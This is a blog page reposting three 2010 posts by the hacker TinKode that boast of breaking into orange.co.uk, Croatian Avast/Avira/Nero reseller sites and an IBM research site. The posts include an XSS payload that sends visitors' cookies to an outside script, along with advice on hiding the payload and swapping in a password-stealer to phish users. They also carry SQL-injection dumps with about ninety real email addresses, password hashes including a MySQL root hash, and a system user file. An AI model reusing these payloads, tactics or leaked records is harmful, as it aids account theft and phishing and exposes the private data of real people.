Wednesday, February 1, 2012

TinKode-Orange Vulnerable to XSS and phishing


Orange Vulnerable to XSS and phishing

Posted by isrtinkode on February 19, 2010
                       ____                               _    _ _  __
                      / __ \                             | |  | | |/ /
                     | |  | |_ __ __ _ _ __   __ _  ___  | |  | | ' /
                     | |  | | '__/ _` | '_ \ / _` |/ _ \ | |  | |  <
                     | |__| | | | (_| | | | | (_| |  __/ | |__| | . \
                      \____/|_|  \__,_|_| |_|\__, |\___|  \____/|_|\_\
                                              __/ |
                                             |___/
                                            # TinKode & La Magra@ Romania
XSS – [Cross-Site Scripting]
Informations:
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which enable malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy…
More here: [ XSS ]
I just found a XSS vulnerability in website.orange.co.uk website.
Through this vulnerability, an attacker could inject HTML or JavaScript code which may lead to cookie stealing.
Proof of Concept:

Link:
http://censored/index.php?module=censored=">censored  src=javascript:censored="http://censored?censored="+document.censored+"&censored")></censored>
c0de:
"><censored" src=javascript:censored="http://censored.site.com/censored.php?censored="+document.censored>
We can encode the malicous code in base64, hex, etc in order to hide our intentions! :)
Another example for this vulnerability is phishing! :D
As everyone knows, there are programs called stealer which can steal all saved passwords from your browser.
I picked a executable program (winamp in our case) for a demonstration.
Link to download winamp: http://download.nullsoft.com/winamp/client/winamp5572_lite_en-us.exe
The malicious code:
"><censored  src="http://download.nullsoft.com/winamp/client/winamp5572_lite_en-us.exe">censored
Encoded in hex will become:

http://website.orange.co.uk/censored
Replace the winamp link with another one(eg: a stealer) and you can trick a lot of people.
Note: This isn’t the only vulnerability which I found in : orange.co.uk
#Tinkode

TinKode-Avast,Avira,Nero Full Disclosure Accounts Exposed


Avast,Avira,Nero Full Disclosure Accounts Exposed

Posted by isrtinkode on February 28, 2010
                       _                  _             _   _
    /\                | |       /\       (_)           | \ | |
   /  \__   ____ _ ___| |_     /  \__   ___ _ __ __ _  |  \| | ___ _ __ ___
  / /\ \ \ / / _` / __| __|   / /\ \ \ / / | '__/ _` | | . ` |/ _ \ '__/ _ \
 / ____ \ V / (_| \__ \ |_ _ / ____ \ V /| | | | (_| |_| |\  |  __/ | | (_) |
/_/    \_\_/ \__,_|___/\__( )_/    \_\_/ |_|_|  \__,_( )_| \_|\___|_|  \___/
                          |/                         |/
                                     #TinKode & Jackhax0r @ Full Disclosure
Informations:
Company Miam-Veri d.o.o is a representative of avast! products for the Republic of Croatia.
Miam-Veri d.o.o. is reseller for Avast! Antivirus, GFI Software, Adobe and Nero VLP.
Avira Antivirus
Avast! – Computer virus, worm and Trojan protection
GFI – Fax server, Exchange and network software
Adobe – Print, design and publishing software
Nero VLP – All-In-One Digital Media Solutions
Vulnerable links:
Avast: http://www.avast.software.hr/detalji.asp?ID=9
GFI: http://gfi.software.hr/detalji.asp?ID=7
Nero: http://nero.software.hr/detalji.asp?ID=67
Avira: http://avira.software.hr/detalji.asp?ID=6
Testing:



Main Informations:
[*]Version = Microsoft SQL Server 2005 – 9.00.4053.00 (Intel X86) May 26 2009 14:24:20 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
[*]Current User = censored
[*]Current Database = censored
[*]Server = Microsoft-IIS/6.0
Screen:
All Databases (46):
censored
master
tempdb
model
msdb
ASPNETDB
dnn_zupa
GalaTest
hram-zdravlja-dnn
codeit
tiashop
radio_ivanec_hr_dnn
gipsmont-cosic
drvodjelac_hr_dnn
hps_hr_dnn
moto_gume_com_vs
kridom2
kridomhr
EMOS_ZG
Nekretnine
nnmkor
oglasnik
emitri_hr_emitri
24sata2
novi-informatorProduction
rideatrain
mdosobnidnevnik
CY_2008
CYRacuni
testMISO3
croatia_rab_net_katalog
dracomerx_hr_CompanyWeb
mojkompjuter_com_mojkompjuter
lglas
motoklub_cms
POSLOVNIPROSTOR
vs-baterije
rituals
FRIGOTEHNIKA
knjiga
shop_manitabo_com_vs
bednja_hr_baza
9A4DK_com_dnn
TicketTool
split_itportal_com_CompanyWeb
vs-marjan-tisak
Tables from main database “censored“:
DJELATNOSTI
FINTAB
Komentar
KomentarPoslovanja
KontrolaNaloga
KontrolaNalogaPojedinac
KontrolaNalogaTemp
Limiti
LOG
OBRASCI
OBVEZNIK
OPCI1
OPCI2
OPERATERI
POGRESKE
Pokazatelji
PonudeHyperion2
PonudeH
TA
TAB_ZAG
TABBC101
TABBC102
TABBC103
TABDE101
TABDE102
TABDE103
TABLICE
ZAGLAV
TFI-POD
vVrijednosnica
vVrijednosnicaTFI
AvastAdmin
AvastTecaj
AvastTempNar
AvastKategorije
AvastNarproizvod
AvastNarudzbe
AvastNaslovna
AvastProgrami
KontniPlan
Racuni
RacuniDet
Ponude
PonudeDet
AviraKategorije
AviraPopis
AvastPopis
AvastProizvodi
AviraProizvodi
AvastIsplata
NeroKategorije
NeroProizvodi
AvastKorisnici
Kupci
AvastKupci
Columns from table “censored“:
Username: censored
Password:censored

OMG! WTF IS THAT? O_o
Accounts from “censored“:
Username : Password : Email
censoredcensored–avast@software.hr
censoredcensored–info@infoplanet.hr
censoredcensored–eksa-bit@ri.t-com.hrcensored–censored–brkaric@gmail.com
censoredcensored–kontakt@aero-racunala.hr
censoredcensored–info@diskont24.com
censoredcensored–damir@node.hr
censoredcensored–info@najkomp.hr
censoredcensored–servis@ultimus.hr; shop@ultimu
censoredcensored–amisa@amisa.hr
censoredcensored–info@vobis.hr
censoredcensored–partner.avast@signon.hr
censoredcensored–fran.baca@knjigice.com
censoredcensored–info@chloris-informatika.hr
censoredcensored–olicomp@optinet.hr
censoredcensored–instar@instar-informatika.hr
censoredcensored–magazinrs@magazinrs.hr
censoredcensored–kreso@cio.hr
censoredcensored–edrazenovic@gmail.com
censoredcensored–alen@besoft.hr
censoredcensored–mprahin@gmail.com
censoredcensored–1990ivan.maric@gmail.com
censoredcensored–tspinjac@gmail.com
censoredcensored–optima@optima-zadar.hr
censoredcensored–hturcin@hotmail.com
censoredcensored–danko@adm.hr
censoredcensored–mpasicko@gmail.com
censoredcensored–faithfry@gmail.com
censoredcensored–sasa.jovanovic@inet.hr
censoredcensored–prut@email.com
censoredcensored–dsajcic@gmail.com
censoredcensored–marko.pecatnik@gmail.com
censoredcensored–dominik.dusak@gmail.com
censoredcensored–valter.stemberga2@gmail.com
censoredcensored–slavica.zubak@hotmail.com
censoredcensored–hrvoje.humski@gmail.com
censoredcensored–antonio@software.hr
censoredcensored–info@studio-slatina.hr
censoredcensored–damir.hlaj@ka.t-com.hr
censoredcensored–frediienator@gmail.com
censoredcensored–bojan.podnar@gmail.com
censoredcensored–igorkolar25@gmail.com
censoredcensored–zlajamaxi@gmail.com
censoredcensored–grimir69@net.hr
censoredcensored–npavic_82@yahoo.com
censoredcensored–albukvic@gmail.com
censoredcensored–dlistes@gmail.com
censoredcensored–stzizic@gmail.com
censoredcensored–samuel.koprivnjak@gmail.com
censoredcensored–marin.farkas@gmail.com
censoredcensored–tomislav.parcina@gmail.com
censoredcensored–vklen@net.hr
censoredcensored–dlonjak@ffos.hr
censoredcensored–osjecko2@gmail.com
censoredcensored–miro.sertic@email.t-com.hr
censoredcensored–milolozaantonio@yahoo.com
censoredcensored–jogalic@gmail.com
censoredcensored–robimlinar@gmail.com
censoredcensored–josip.crnicki@gmail.com
censoredcensored–antisa1@optinet.hr
censoredcensored–braneweb@gmail.com
censoredcensored–ninovukic@gmail.com
censoredcensored–e.one@post.t-com.hr
censoredcensored–fran.jadrijev@hotmail.com
censoredcensored–houseboki@gmail.com
censoredcensored–som@somware.hr
censoredcensored–info@studio-bonet.com
censoredcensored–skydiver.extreme@gmail.com
censoredcensored–nik238@net.hr
censoredcensored–odiriuss@gmail.com
censoredcensored–mario44@net.hr
censoredcensored–marina.velat@gmail.com
censoredcensored–nikolavlacic@gmail.com
censoredcensored–eomersblood@gmail.com
censoredcensored–doris.fiume@gmail.com
censoredcensored–vjeran555@yahoo.com
censoredcensored–dumbovic@gmail.com
censoredcensored–shogo.cro@gmail.com
censoredcensored–vanja.rain@hi.t-com.hr
censoredcensored–mladen.basic@email.t-com.hr
censoredcensored–lahor.enc@sk.htnet.hr
censoredcensored–mate.barbaric@gmail.com
censoredcensored–mestrovic.ma@gmail.com
censoredcensored–Z.HRVOIC@vip.hr
censoredcensored–binogrupa@bino.hr
censoredcensored–info@pixma-itshop.com
censoredcensored–vekkica@hotmail.com
censoredcensored–goran.nxn@gmail.com
censoredcensored–castoos@gmail.com
censoredcensored–brkcomp@brkcomp.hr
censoredcensored–ivanvalentic81@gmail.com
censoredcensored–ivan.cajkovac@gmail.com
censoredcensored–binder.jo@gmail.com
[LOL]
So, all official reprezentative websites of Avast, Avira, Nero, GFI created by Miam-Veri D.O.O are vulnerable!
Great!
~TinKode
~Never forgot the power of silence! :)

TinKode-IBM Full Disclosure SQL Injection


IBM Full Disclosure SQL Injection

Posted by isrtinkode on March 4, 2010
#TinKode & skpx & begood
About IBM:
International Business Machines (NYSE: IBM), abbreviated IBM, is a multinational computer, technology and IT consulting corporation headquartered in Armonk, North Castle, New York, United States. The company is one of the few information technology companies with a continuous history dating back to the 19th century. IBM manufactures and sells computer hardware and software (with a focus on the latter), and offers infrastructure services, hosting services, and consulting services in areas ranging from mainframe computers to nanotechnology.
IBM has been well known through most of its recent history as the world's largest computer company and systems integrator. With over 407,000 employees worldwide, IBM is the largest and most profitable information technology and services employer in the world according to the Forbes 2000 list with sales of greater than 100 billion US dollars. IBM holds more patents than any other U.S. based technology company and has eight research laboratories worldwide. The company has scientists, engineers, consultants, and sales professionals in over 200 countries.
Vulnerable website:www.researcher.ibm.com

Version: 5.0.67
User: censored
Database: researcher_development
Datadir: /Applications/ censored /var/mysql/

All databases:
information_schema
bluebase
cdcol
mysql
researcher_development
test

Tables from main database “researcher_development“:
group_types
groups
locations
navbar_entries
publication_authors
publications
redirects
research_areas
researcher_group_entries
researcher_navbar_entries
researchers
Tables from “bluebase” database:
activity
auth_group
auth_group_permissions
auth_message
auth_permission
auth_user
auth_user_groups
auth_user_user_permissions
bluecomments_bluecomment
bluecomments_bluekarmascore
bluecomments_bluemoderatordeletion
bluecomments_blueuserflag
comments_comment
comments_freecomment
comments_karmascore
comments_moderatordeletion
comments_userflag
django_admin_log
django_content_type
django_session
django_site
projects_appacademy08
projects_application
projects_application_members
projects_application_moderators
projects_application_restrict
projects_appspeaker
projects_changelog
projects_document
projects_notespubdb
projects_patent
projects_patent_authors
projects_person
projects_pic
projects_pic_chairs
projects_project
projects_project_application
projects_project_contacts
projects_project_docs
projects_project_linemanagers
projects_project_members
projects_project_pics
projects_project_reviewers
projects_project_tags
projects_publication
projects_publication_authors
projects_pubstat
projects_restriction
projects_restriction_access_list
projects_tag
projects_useractivity
tag
tagged_item
votes
Accounts from “auth_user” table:
censored: sha1 censored  | hash cracked:  censored 
censored: sha1 censored   | hash cracked: censored

The account from “mysql.user“:
root : *F9F9C3D7DD04044668ABBFA629CE289E02F7A918 | hash cracked: 
censored

Here we can see the “ censored “:
# User Database
#
# Note that this file is consulted directly only when the system is running
# in single-user mode. At other times this information is provided by
# Open Directory.
#
# This file will not be consulted for authentication unless the BSD local node
# is enabled via /Applications/Utilities/Directory Utility.app
#
# See the DirectoryService(8) man page for additional information about
# Open Directory.
##
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico
_lp:*:26:26:Printing Services:/var/spool/cups:/usr/bin/false
_postfix:*:27:27:Postfix Mail Server:/var/spool/postfix:/usr/bin/false
_mcxalr:*:54:54:MCX AppLaunch:/var/empty:/usr/bin/false
_pcastagent:*:55:55:Podcast Producer Agent:/var/pcast/agent:/usr/bin/false
_pcastserver:*:56:56:Podcast Producer Server:/var/pcast/server:/usr/bin/false
_serialnumberd:*:58:58:Serial Number Daemon:/var/empty:/usr/bin/false
_devdocs:*:59:59:Developer Documentation:/var/empty:/usr/bin/false
_sandbox:*:60:60:Seatbelt:/var/empty:/usr/bin/false
_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false
_ard:*:67:67:Apple Remote Desktop:/var/empty:/usr/bin/false
_www:*:70:70:World Wide Web Server:/Library/WebServer:/usr/bin/false
_eppc:*:71:71:Apple Events User:/var/empty:/usr/bin/false
_cvs:*:72:72:CVS Server:/var/empty:/usr/bin/false
_svn:*:73:73:SVN Server:/var/empty:/usr/bin/false
_mysql:*:74:74:MySQL Server:/var/empty:/usr/bin/false
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
_qtss:*:76:76:QuickTime Streaming Server:/var/empty:/usr/bin/false
_cyrus:*:77:6:Cyrus Administrator:/var/imap:/usr/bin/false
_mailman:*:78:78:Mailman List Server:/var/empty:/usr/bin/false
_appserver:*:79:79:Application Server:/var/empty:/usr/bin/false
_clamav:*:82:82:ClamAV Daemon:/var/virusmails:/usr/bin/false
_amavisd:*:83:83:AMaViS Daemon:/var/virusmails:/usr/bin/false
_jabber:*:84:84:Jabber XMPP Server:/var/empty:/usr/bin/false
_xgridcontroller:*:85:85:Xgrid Controller:/var/xgrid/controller:/usr/bin/false
_xgridagent:*:86:86:Xgrid Agent:/var/xgrid/agent:/usr/bin/false
_appowner:*:87:87:Application Owner:/var/empty:/usr/bin/false
_windowserver:*:88:88:WindowServer:/var/empty:/usr/bin/false
_spotlight:*:89:89:Spotlight:/var/empty:/usr/bin/false
_tokend:*:91:91:Token Daemon:/var/empty:/usr/bin/false
_securityagent:*:92:92:SecurityAgent:/var/empty:/usr/bin/false
_calendar:*:93:93:Calendar:/var/empty:/usr/bin/false
_teamsserver:*:94:94:TeamsServer:/var/teamsserver:/usr/bin/false
_update_sharing:*:95:-2:Update Sharing:/var/empty:/usr/bin/false
_installer:*:96:-2:Installer:/var/empty:/usr/bin/false
_atsserver:*:97:97:ATS Server:/var/empty:/usr/bin/false
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false
That it’s all! :)
@TinKode